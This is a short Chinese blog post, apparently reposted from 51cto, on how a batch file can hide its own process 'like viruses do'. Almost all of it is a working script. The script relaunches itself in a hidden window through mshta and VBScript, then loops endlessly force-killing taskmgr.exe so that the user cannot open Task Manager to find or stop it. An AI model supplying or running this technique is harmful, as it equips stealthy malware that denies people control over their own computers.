隐藏自己的进程

病毒通常情况下都会隐藏自己的进程,咱们用批处理也能将自己隐藏,来看看

 

 
  
  
  
  
  1. @echo off  
  2. if "%1" == "h" goto begin  
  3. mshta vbscript:createobject("wscript.shell").run("%~nx0 h",0)(window.close)&&exit  
  4. :begin  
  5. for /l %%i in (1,1,255) do taskkill /f /im taskmgr.exe>nul 2>nul&ping 127.0.1 /n 1>nul  
  6. goto begin 

 

本文出自 “乔磊的博客 学习 进步” 博客,请务必保留此出处http://sucre.blog.51cto.com/1084905/412997

你可能感兴趣的:(职场,bat,休闲)